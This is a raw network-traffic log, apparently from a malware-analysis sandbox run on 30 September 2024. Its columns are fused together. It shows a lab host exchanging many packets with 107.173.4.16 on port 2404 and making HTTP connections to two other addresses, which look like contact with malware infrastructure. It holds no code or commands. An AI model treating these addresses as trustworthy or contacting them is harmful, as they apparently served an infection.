                                                                            Sep 30, 2024 09:56:20.848139048 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.848148108 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.848166943 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.848177910 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.848181963 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.848196983 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.848197937 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.848212957 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.848253012 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.848253012 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.854017019 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.875123978 CEST491742404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.879987001 CEST240449174107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.928903103 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.928935051 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.928945065 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.928966045 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.928977013 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.928989887 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929003000 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929039001 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929048061 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929069042 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929081917 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929090977 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929095030 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929109097 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929120064 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929121017 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929152012 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929152966 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929171085 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929191113 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929202080 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929214001 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929215908 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929239035 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929243088 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929255962 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929267883 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929282904 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929301023 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929414988 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929434061 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929445982 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929457903 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929462910 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929467916 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929475069 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929476023 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929486990 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929508924 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929514885 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929519892 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929524899 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929538012 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929557085 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929568052 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929570913 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929580927 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929589033 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929594040 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929629087 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929629087 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929642916 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929649115 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929658890 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929672003 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929692030 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929697037 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929707050 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929719925 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929732084 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929732084 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929771900 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929811954 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929825068 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929836988 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929856062 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929862976 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929869890 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929883957 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929896116 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929903984 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929907084 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929919004 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929919958 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929932117 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929936886 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929943085 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929944992 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929961920 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929972887 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.929985046 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.929986000 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930000067 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930022955 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930118084 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930130959 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930143118 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930149078 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930160046 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930166006 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930174112 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930186033 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930186033 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930218935 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930250883 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930264950 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930284023 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930294991 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930300951 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930308104 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930320024 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930329084 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930331945 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930358887 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930382013 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930394888 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930403948 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930416107 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930429935 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930454969 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930547953 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930567026 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930579901 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930584908 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930591106 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930602074 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930619955 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930622101 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930633068 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930646896 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930658102 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930663109 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930671930 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930684090 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930687904 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930696011 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930708885 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930716038 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930720091 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930732965 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930744886 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930749893 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930752039 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930783033 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930785894 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930795908 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930800915 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930813074 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930833101 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930836916 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930845022 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930851936 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930866003 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930876970 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930890083 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930900097 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930905104 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.930908918 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.930942059 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.931014061 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931026936 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931037903 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931049109 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931060076 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931063890 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.931071997 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931083918 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931088924 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.931096077 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931108952 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:20.931113005 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.931134939 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:20.957192898 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.015911102 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.015944004 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.015964031 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016006947 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016012907 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016026020 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016037941 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016051054 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016062975 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016077995 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016088009 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016091108 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016100883 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016103983 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016113997 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016128063 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016134977 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016140938 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016151905 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016161919 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016171932 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016187906 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016216040 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016326904 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016349077 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016359091 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016379118 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016390085 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016392946 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016402006 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016416073 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016427040 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016436100 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016463995 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016527891 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016540051 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016551018 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016571999 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016602993 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016602993 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016618013 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016690016 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.016921997 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.016972065 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017009020 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017020941 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017076969 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017122984 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017131090 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017164946 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017214060 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017225981 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017247915 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017282009 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017296076 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017314911 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017359018 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017364025 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017399073 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017431021 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017442942 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017462969 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017497063 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017510891 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017539024 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017575979 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017584085 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.017606974 CEST240449175107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:21.017653942 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.138170958 CEST491752404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:21.741295099 CEST8049176178.237.33.50192.168.2.22
                                                                            Sep 30, 2024 09:56:21.741363049 CEST4917680192.168.2.22178.237.33.50
                                                                            Sep 30, 2024 09:56:43.460251093 CEST240449174107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:56:43.497559071 CEST491742404192.168.2.22107.173.4.16
                                                                            Sep 30, 2024 09:56:43.502356052 CEST240449174107.173.4.16192.168.2.22
                                                                            Sep 30, 2024 09:57:00.456599951 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.461661100 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.461792946 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.472546101 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.477437019 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946851969 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946877003 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946892023 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946908951 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946919918 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946930885 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946942091 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946953058 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946963072 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.946974993 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.947012901 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.949240923 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.951827049 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.951873064 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:00.951884985 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:00.951915979 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033689022 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033724070 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033761024 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033773899 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033782959 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033807039 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033812046 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033839941 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033847094 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033871889 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033879042 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033905029 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.033911943 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.033943892 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034538031 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034569979 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034580946 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034603119 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034609079 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034635067 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034640074 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034670115 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.034674883 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.034708977 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035356998 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035398960 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035409927 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035442114 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035449982 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035480022 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035480022 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035516024 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.035521030 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.035553932 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036254883 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036303997 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036305904 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036389112 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036396980 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036421061 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036429882 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036454916 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.036459923 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.036494017 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.038784027 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.038832903 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.038853884 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.038897991 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.038933992 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.038973093 CEST4917780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:57:01.120678902 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.120748997 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.120803118 CEST8049177192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:57:01.120836973 CEST8049177192.3.220.22192.168.2.22
